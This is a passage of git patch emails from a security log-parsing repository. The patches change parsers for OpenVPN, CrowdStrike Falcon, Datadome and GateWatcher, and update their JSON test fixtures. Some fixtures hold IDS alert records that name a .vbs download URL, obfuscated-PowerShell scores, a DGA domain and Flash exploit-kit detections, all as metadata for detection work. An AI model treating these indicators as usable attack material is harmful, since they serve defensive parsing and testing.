GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
+  },
+  "expected": {
+    "message": "{\"event_type\":\"http\",\"http\":{\"accept_encoding\":\"gzip, deflate\",\"server\":\"524\",\"accept\":\"text/html, application/xhtml+xml, */*\",\"url\":\"/download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"dc524.4shared.com\",\"accept_language\":\"en-US\",\"location\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"length\":0,\"status\":302,\"http_user_agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\"date\":\"Wed, 17 Aug 2016 01:34:43 GMT\",\"redirect\":\"http://cdnfiles.4shared.com/web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F\",\"content_length\":\"0\",\"cookie\":\"day1host=h\",\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.377Z\",\"uuid\":\"f8ee6e33-91ef-404f-bad3-a69185416a0d\",\"type\":\"suricata\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"@timestamp\":\"2023-03-22T10:44:07.997Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:07.997Z\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"dest_port\":16122,\"src_port\":8550,\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"proto\":\"TCP\",\"tx_id\":0,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
+  }
+}
\ No newline at end of file

From ced0e2cd17734fdbb3babae92a4db981d0e818c0 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 13 Sep 2024 16:54:32 +0200
Subject: [PATCH 022/317] fix: Add username fields on OpenVPN Grok patterns

---
 OpenVPN/openvpn/ingest/parser.yml             |  6 +--
 .../openvpn/tests/client_information_25.json  | 40 +++++++++++++++++
 .../openvpn/tests/client_information_26.json  | 40 +++++++++++++++++
 OpenVPN/openvpn/tests/tls_information_1.json  | 43 +++++++++++++++++++
 4 files changed, 126 insertions(+), 3 deletions(-)
 create mode 100644 OpenVPN/openvpn/tests/client_information_25.json
 create mode 100644 OpenVPN/openvpn/tests/client_information_26.json
 create mode 100644 OpenVPN/openvpn/tests/tls_information_1.json

diff --git a/OpenVPN/openvpn/ingest/parser.yml b/OpenVPN/openvpn/ingest/parser.yml
index 117dde1ba..e22379d0b 100644
--- a/OpenVPN/openvpn/ingest/parser.yml
+++ b/OpenVPN/openvpn/ingest/parser.yml
@@ -29,9 +29,9 @@ pipeline:
           CLIENT_CONNECTION_1: "%{DATA} %{IP:nat_ip} -> %{WORD:client_domain}/%{IP:client_ip}:%{NUMBER:client_port}"
           CLIENT_CONNECTION_2: "%{DATA} %{WORD:client_domain}/%{IP:client_ip}:%{NUMBER:client_port}: %{IP:nat_ip}"
           CLIENT_CONNECTION_3: "%{WORD:client_domain},%{IP:nat_ip},"
-          CLIENT_CONNECTION_4: '%{IP:client_ip}:%{NUMBER:client_port} \[%{WORD:client_domain}\] %{DATA}'
-          TLS_INFO: "%{IP:client_ip}:%{NUMBER:client_port} %{DATA}: TLS%{DATA:tls_version}, cipher %{DATA} %{DATA:tls_cipher}, %{DATA}"
-          CLIENT_INFO_1: "%{IP:client_ip}:%{NUMBER:client_port} %{DATA:event_reason}"
+          CLIENT_CONNECTION_4: '(%{USER:user_name}/)?%{IP:client_ip}:%{NUMBER:client_port} \[%{WORD:client_domain}\] %{DATA}'
+          TLS_INFO: "(%{USER:user_name}/)?%{IP:client_ip}:%{NUMBER:client_port} %{DATA}: TLS%{DATA:tls_version}, cipher %{DATA} %{DATA:tls_cipher}, %{DATA}"
+          CLIENT_INFO_1: "(%{USER:user_name}/)?%{IP:client_ip}:%{NUMBER:client_port} %{DATA:event_reason}"
           CLIENT_INFO_2: "%{DATA:event_reason}\\(\\), in='%{WORD:client_domain},%{IP:client_ip},'"
           CLIENT_INFO_3: "%{DATA:event_reason}: base=%{IP:client_ip} size=%{NUMBER}"
           DEFAULT: "%{DATA:event_reason}"
diff --git a/OpenVPN/openvpn/tests/client_information_25.json b/OpenVPN/openvpn/tests/client_information_25.json
new file mode 100644
index 000000000..ac1f33f83
--- /dev/null
+++ b/OpenVPN/openvpn/tests/client_information_25.json
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 TLS: soft reset sec=3289/3289 bytes=781236/-1 pkts=3065/0",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "OpenVPN",
+        "dialect_uuid": "e8ca856f-8a58-490b-bea4-247b12b3d74b"
+      }
+    }
+  },
+  "expected": {
+    "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 TLS: soft reset sec=3289/3289 bytes=781236/-1 pkts=3065/0",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "reason": "TLS: soft reset sec=3289/3289 bytes=781236/-1 pkts=3065/0",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-05T14:39:31Z",
+    "client": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 12399
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "john.doe"
+      ]
+    },
+    "user": {
+      "name": "john.doe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/OpenVPN/openvpn/tests/client_information_26.json b/OpenVPN/openvpn/tests/client_information_26.json
new file mode 100644
index 000000000..debbac67f
--- /dev/null
+++ b/OpenVPN/openvpn/tests/client_information_26.json
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 TLS: Username/Password authentication deferred for username 'john.doe'",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "OpenVPN",
+        "dialect_uuid": "e8ca856f-8a58-490b-bea4-247b12b3d74b"
+      }
+    }
+  },
+  "expected": {
+    "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 TLS: Username/Password authentication deferred for username 'john.doe'",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "reason": "TLS: Username/Password authentication deferred for username 'john.doe'",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-05T14:39:31Z",
+    "client": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 12399
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "john.doe"
+      ]
+    },
+    "user": {
+      "name": "john.doe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/OpenVPN/openvpn/tests/tls_information_1.json b/OpenVPN/openvpn/tests/tls_information_1.json
new file mode 100644
index 000000000..ed8703aaf
--- /dev/null
+++ b/OpenVPN/openvpn/tests/tls_information_1.json
@@ -0,0 +1,43 @@
+{
+  "input": {
+    "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 4096 bits RSA, signature: RSA-SHA256, peer temporary key: 253 bits X12345",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "OpenVPN",
+        "dialect_uuid": "e8ca856f-8a58-490b-bea4-247b12b3d74b"
+      }
+    }
+  },
+  "expected": {
+    "message": "2024-09-05 14:39:31 john.doe/1.2.3.4:12399 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 4096 bits RSA, signature: RSA-SHA256, peer temporary key: 253 bits X12345",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-05T14:39:31Z",
+    "client": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 12399
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "john.doe"
+      ]
+    },
+    "tls": {
+      "cipher": "TLS_AES_256_GCM_SHA384",
+      "version": "v1.3"
+    },
+    "user": {
+      "name": "john.doe"
+    }
+  }
+}
\ No newline at end of file

From fb7c21b95bc2046c23ceb92283e91d8f3269eeb4 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 13 Sep 2024 16:56:23 +0200
Subject: [PATCH 023/317] fix(CrowdStrikeFalcon): convert context.pid into
 string.

The number representation is to high to be indexed
---
 CrowdStrike/crowdstrike_falcon/ingest/parser.yml                | 2 +-
 .../tests/mobile_detection_network_connections.json             | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/CrowdStrike/crowdstrike_falcon/ingest/parser.yml b/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
index f739a0b70..6f02f064c 100644
--- a/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
+++ b/CrowdStrike/crowdstrike_falcon/ingest/parser.yml
@@ -567,7 +567,7 @@ stages:
             {%- set timestamp = item.get("AccessTimestamp") | to_rfc3339 -%}
             {%- set direction = item.get("ConnectionDirection") | int -%}
             {%- set flags = item.get("ConnectionFlags") | int -%}
-            {%- set context = {"pid":item.get("ContextProcessId")} -%}
+            {%- set context = {"pid":item.get("ContextProcessId") | string} -%}
             {%- set is_ipv6 = item.get("IsIPV6") -%}
             {%- set protocol = item.get("Protocol") | int -%}
             {%- set url = item.get("Url") -%}
diff --git a/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json b/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
index 04c212800..6b73b6fdb 100644
--- a/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
+++ b/CrowdStrike/crowdstrike_falcon/tests/mobile_detection_network_connections.json
@@ -38,7 +38,7 @@
         "network_connections": [
           {
             "context": {
-              "pid": 17793441978049446000
+              "pid": "17793441978049446000"
             },
             "destination": {
               "address": "1.2.3.4",

From 7435fb57d7eb75dc135922816b0a34426f544c25 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 13 Sep 2024 17:20:33 +0200
Subject: [PATCH 024/317] Datadome: fix on event.duration field

---
 .../datadome-protection/ingest/parser.yml     | 18 +++++++-
 .../tests/test_alert_with_duration.json       | 44 +++++++++++++++++++
 2 files changed, 61 insertions(+), 1 deletion(-)
 create mode 100644 Datadome/datadome-protection/tests/test_alert_with_duration.json

diff --git a/Datadome/datadome-protection/ingest/parser.yml b/Datadome/datadome-protection/ingest/parser.yml
index 2e1f7219d..07ff32e88 100644
--- a/Datadome/datadome-protection/ingest/parser.yml
+++ b/Datadome/datadome-protection/ingest/parser.yml
@@ -33,7 +33,23 @@ stages:
         filter: "{{parsed_event.message.endDateTime | length > 0}}"
 
       - set:
-          event.duration: "{{parsed_event.message.duration | float * 1_000_000_000}}"
+          event.duration: >
+            {%- set hour = 0 -%}
+            {%- set minute = 0 -%}
+            {%- set second = 0 -%}
+            {%- set duration = parsed_event.message.duration -%}
+            {%- if "hours" in duration -%}
+              {%- set hour = duration.split(" hours")[0] -%}
+              {%- set duration = duration.split(" hours")[1] -%}
+            {%- endif -%}
+            {%- if "minutes" in duration -%}
+              {%- set minute = duration.split(" minutes")[0] -%}
+              {%- set duration = duration.split(" minutes")[1] -%}
+            {%- endif -%}
+            {%- if "seconds" in duration -%}
+              {%- set second = duration.split(" seconds")[0] -%}
+            {%- endif -%}
+            {{(hour | int * 3600 + minute | int * 60 + second | int) * 1_000_000_000}}
         filter: "{{parsed_event.message.duration | length > 0}}"
 
       - set:
diff --git a/Datadome/datadome-protection/tests/test_alert_with_duration.json b/Datadome/datadome-protection/tests/test_alert_with_duration.json
new file mode 100644
index 000000000..0dd928c38
--- /dev/null
+++ b/Datadome/datadome-protection/tests/test_alert_with_duration.json
@@ -0,0 +1,44 @@
+{
+  "input": {
+    "message": "{\n    \"accountName\": \"Account name\",\n    \"isProtected\": false,\n    \"threatName\": \"Threat\",\n    \"endpointName\": \"Endpoint\",\n    \"duration\": \"8 minutes 15 seconds\",\n    \"startDateTime\": \"06 September, 08:01 UTC +00:00\",\n    \"endDateTime\": \"06 September, 08:09 UTC +00:00\",\n    \"requestsCount\": \"10,558\",\n    \"peakSpeed\": \"1,457\",\n    \"ipCount\": \"393\",\n    \"uaCount\": \"82\",\n    \"countryCount\": \"17\",\n    \"urlCount\": \"2,221\"\n}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Datadome Protection",
+        "dialect_uuid": "acd3374a-9738-4650-9d20-bd0a22daac40"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\n    \"accountName\": \"Account name\",\n    \"isProtected\": false,\n    \"threatName\": \"Threat\",\n    \"endpointName\": \"Endpoint\",\n    \"duration\": \"8 minutes 15 seconds\",\n    \"startDateTime\": \"06 September, 08:01 UTC +00:00\",\n    \"endDateTime\": \"06 September, 08:09 UTC +00:00\",\n    \"requestsCount\": \"10,558\",\n    \"peakSpeed\": \"1,457\",\n    \"ipCount\": \"393\",\n    \"uaCount\": \"82\",\n    \"countryCount\": \"17\",\n    \"urlCount\": \"2,221\"\n}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "duration": 495000000000,
+      "end": "2024-09-06T08:09:00Z",
+      "kind": "alert",
+      "start": "2024-09-06T08:01:00Z",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-06T08:01:00Z",
+    "cloud": {
+      "account": {
+        "name": "Account name"
+      }
+    },
+    "host": {
+      "name": "Endpoint"
+    },
+    "observer": {
+      "product": "Datadome protection",
+      "vendor": "Datadome"
+    },
+    "threat": {
+      "indicator": {
+        "name": "Threat"
+      }
+    }
+  }
+}
\ No newline at end of file

From e30aba42efa2b40b19d3bc972745f988b9b69122 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Fri, 13 Sep 2024 17:24:13 +0200
Subject: [PATCH 025/317] fix expectations for tests

---
 GateWatcher/aioniq/tests/codebreaker.json     |  48 ++++++++-
 GateWatcher/aioniq/tests/dga.json             |  43 +++++++-
 GateWatcher/aioniq/tests/malcore.json         |  99 ++++++++++++++++-
 GateWatcher/aioniq/tests/retrohunt.json       |  96 ++++++++++++++++-
 GateWatcher/aioniq/tests/sigflow-alert.json   |  77 ++++++++++++-
 GateWatcher/aioniq/tests/sigflow-file.json    |  88 ++++++++++++++-
 GateWatcher/aioniq/tests/sigflow-meta.json    |  78 +++++++++++++-
 .../aioniq/tests/suricata_alert_event.json    | 101 ------------------
 .../aioniq/tests/suricata_fileinfo_event.json |  98 -----------------
 .../aioniq/tests/suricata_http_event.json     |  88 ---------------
 10 files changed, 522 insertions(+), 294 deletions(-)
 delete mode 100644 GateWatcher/aioniq/tests/suricata_alert_event.json
 delete mode 100644 GateWatcher/aioniq/tests/suricata_fileinfo_event.json
 delete mode 100644 GateWatcher/aioniq/tests/suricata_http_event.json

diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json
index 606433e7e..5fdb0ae34 100644
--- a/GateWatcher/aioniq/tests/codebreaker.json
+++ b/GateWatcher/aioniq/tests/codebreaker.json
@@ -9,6 +9,52 @@
     "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
   },
   "expected": {
-    "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}"
+    "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "module": "powershell",
+      "severity": 1
+    },
+    "@timestamp": "2023-03-22T10:32:50.269000Z",
+    "destination": {
+      "address": "2.2.2.2",
+      "ip": "2.2.2.2",
+      "port": 35444
+    },
+    "gatewatcher": {
+      "event_type": "powershell",
+      "flow_id": "2157601933358692",
+      "gcap": "gcap-xxxxxxxxxx.domain.local",
+      "gcenter": "gcenter-xxxxxxxxxx.domain.local",
+      "sample_id": "03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local",
+      "scores": {
+        "analysis": 1890,
+        "analysis_detailed": "{\"AddContent\": 0, \"Base64\": 1520, \"CharInt\": 0, \"FmtStr\": 0, \"GetContent\": 0, \"InvokeExpression\": 0, \"InvokeRestMethod\": 0, \"InvokeWebRequest\": 0, \"SetContent\": 0, \"StartBitsTransfer\": 0, \"StrCat\": 370, \"StrJoin\": 0, \"StrReplace\": 0, \"StreamReader\": 0, \"StreamWriter\": 0, \"SystemIOFile\": 0, \"WebClientInvokation\": 0}",
+        "proba_obfuscated": 1.0
+      },
+      "state": "Exploit",
+      "sub_type": "powershell",
+      "timestamp_analyzed": "2023-03-22T10:32:50.269Z",
+      "timestamp_detected": "2023-03-22T10:30:37.145Z",
+      "type": "codebreaker"
+    },
+    "observer": {
+      "name": "gcap-xxxxxxxxxx.domain.local",
+      "type": "ids",
+      "version": "0.2"
+    },
+    "related": {
+      "ip": [
+        "1.1.1.1",
+        "2.2.2.2"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "port": 4242
+    }
   }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json
index 5303e1bb5..9f740f113 100644
--- a/GateWatcher/aioniq/tests/dga.json
+++ b/GateWatcher/aioniq/tests/dga.json
@@ -9,6 +9,47 @@
     "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}"
   },
   "expected": {
-    "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}"
+    "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "module": "dga",
+      "severity": 1
+    },
+    "@timestamp": "2023-03-22T10:46:08.487000Z",
+    "destination": {
+      "address": "2.2.2.2",
+      "ip": "2.2.2.2",
+      "port": 53
+    },
+    "gatewatcher": {
+      "domain_name": "pgoadcmgqfacj.com",
+      "event_type": "dga",
+      "flow_id": "729468278572",
+      "gcap": "gcap-xxxxxxxx.domain.local",
+      "gcenter": "gcenter-xxxxxx.domain.local",
+      "matched_event": "041b2ed4-a5e0-4814-8bdc-7522b6d5464f",
+      "probability": 0.9999731546766107,
+      "timestamp_analyzed": "2023-03-22T10:46:08.487Z",
+      "timestamp_detected": "2023-03-22T10:25:54.903Z",
+      "type": "machine_learning"
+    },
+    "observer": {
+      "name": "gcap-xxxxxxxx.domain.local",
+      "type": "ids",
+      "version": "0.2"
+    },
+    "related": {
+      "ip": [
+        "1.1.1.1",
+        "2.2.2.2"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "port": 1294
+    }
   }
 }
\ No newline at end of file
diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json
index 7a6dc8130..9c3c5ea11 100644
--- a/GateWatcher/aioniq/tests/malcore.json
+++ b/GateWatcher/aioniq/tests/malcore.json
@@ -9,6 +9,103 @@
     "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 